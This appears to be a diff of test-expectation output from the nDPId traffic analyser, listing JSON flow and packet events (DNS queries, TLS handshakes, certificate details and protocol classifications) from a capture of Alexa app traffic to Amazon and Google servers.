{"version":"TLSv1","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195484,"flow_last_seen":1490976195484,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976195484,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1490976195484,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195484,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WmRAAEARM1OsECrYrBAqATpWADUAKI0W4msBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195484,"flow_last_seen":1490976195484,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976195484,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2791,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195484,"flow_last_seen":1490976195484,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976195484,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2792,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1490976195524,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976195524,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC96\/xAAEARoTmsECoBrBAq2AA1OlYAqVJ+4muBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAAW8AAoDd3d3A2NkbsAQwCwABQABAAAAWAAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAABoABDRV0Y\/AQgABAAEAAAAaAAQ0VdF6wEIAAQABAAAAGgAENFXR2MBCAAEAAQAAABoABDRV0cU="} -00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2792,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976195524,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.143"}} +00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2792,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976195524,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.143"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2794,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195529,"flow_last_seen":1490976195529,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195529,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2794,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1490976195529,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195529,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8suhAAEAGqwasECrYNFXRj6NkAbuAhDhYAAAAAKAC\/\/+BjwAAAgQFtAQCCAoA9oqwAAAAAAEDAwg="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195545,"flow_last_seen":1490976195545,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1490976195545,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1490976195545,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1490976195545,"pkt":"AMDKkaPvePiC0\/vCCABFAABIWmVAAEARM0asECrYrBAqAZ3pADUANBzi5IoBAAABAAAAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAE="} -00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195545,"flow_last_seen":1490976195545,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1490976195545,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195545,"flow_last_seen":1490976195545,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1490976195545,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1490976195572,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195572,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqu40VdGPrBAq2AG7o2R8wwHRgIQ4WaAScSCn6AAAAgQFtAQCCApttHwsAPaKsAEDAwg="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2799,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1490976195573,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976195573,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0sulAAEAGqw2sECrYNFXRj6NkAbuAhDhZfMMB0oAQAVdGegAAAQEICgD2irVttHws"} -00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2800,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195529,"flow_last_seen":1490976195574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976195574,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00911{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195529,"flow_last_seen":1490976195621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976195621,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01389{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195529,"flow_last_seen":1490976195622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976195622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2800,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195529,"flow_last_seen":1490976195574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976195574,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00911{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195529,"flow_last_seen":1490976195621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976195621,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01389{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195529,"flow_last_seen":1490976195622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976195622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2810,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":1490976195628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1490976195628,"pkt":"ePiC0\/vCAMDKkaPvCABFAABw6\/5AAEARoYSsECoBrBAq2AA1nekAXGuw5IqBgAABAAIAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAHADAAFAAEAAAErAAwHYW5kcm9pZAFswBzAOAABAAEAAAErAATYOsJO"} -00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2810,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976195628,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.194.78"}} +00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2810,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976195628,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.194.78"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195633,"flow_last_seen":1490976195633,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195633,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1490976195633,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195633,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fD5AAEAGTQysECrY2DrCTr+rAbtBfvaFAAAAAKAC\/\/9RcQAAAgQFtAQCCAoA9oq7AAAAAAEDAwg="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2815,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":1490976195670,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195670,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8ibgAADcGiJLYOsJOrBAq2AG7v6uBvvSDQX72hqASpajvAAAAAgQFZAQCCAoLBTvAAPaKuwEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2816,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":1490976195672,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976195672,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0fD9AAEAGTROsECrY2DrCTr+rAbtBfvaGgb70hIAQAVfBygAAAQEICgD2ir8LBTvA"} -00988{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2820,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195633,"flow_last_seen":1490976195724,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1490976195724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01053{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2824,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195633,"flow_last_seen":1490976195762,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976195762,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} -02117{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2826,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195633,"flow_last_seen":1490976195763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1490976195763,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.gcp.gvt2.com,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,g.co,goo.gl,google-analytics.com,google.com,googlecommerce.com,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google.com","fingerprint":"54:A0:1E:03:FF:CB:33:BC:9D:65:DC:D7:BF:6B:04:2B:F9:F3:D5:42"}} +00988{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2820,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195633,"flow_last_seen":1490976195724,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1490976195724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 